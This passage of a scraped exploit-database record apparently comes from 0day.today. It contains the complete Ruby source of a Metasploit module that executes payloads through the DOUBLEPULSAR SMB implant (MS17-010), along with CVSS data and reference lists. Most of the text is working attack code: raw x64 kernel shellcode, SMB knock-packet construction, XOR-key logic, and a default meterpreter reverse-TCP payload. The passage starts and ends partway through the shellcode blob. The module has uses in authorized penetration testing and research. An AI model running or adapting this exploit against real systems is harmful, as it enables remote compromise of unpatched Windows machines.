\"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-25] #"}, "lastseen": "2021-09-25T00:21:39", "differentElements": ["sourceData"], "edition": 25}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "fd30c15cbe0b4e63089ef4c16f162294", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-26T00:16:00", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, 
{"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-26T00:16:00", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-26T00:16:00", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n 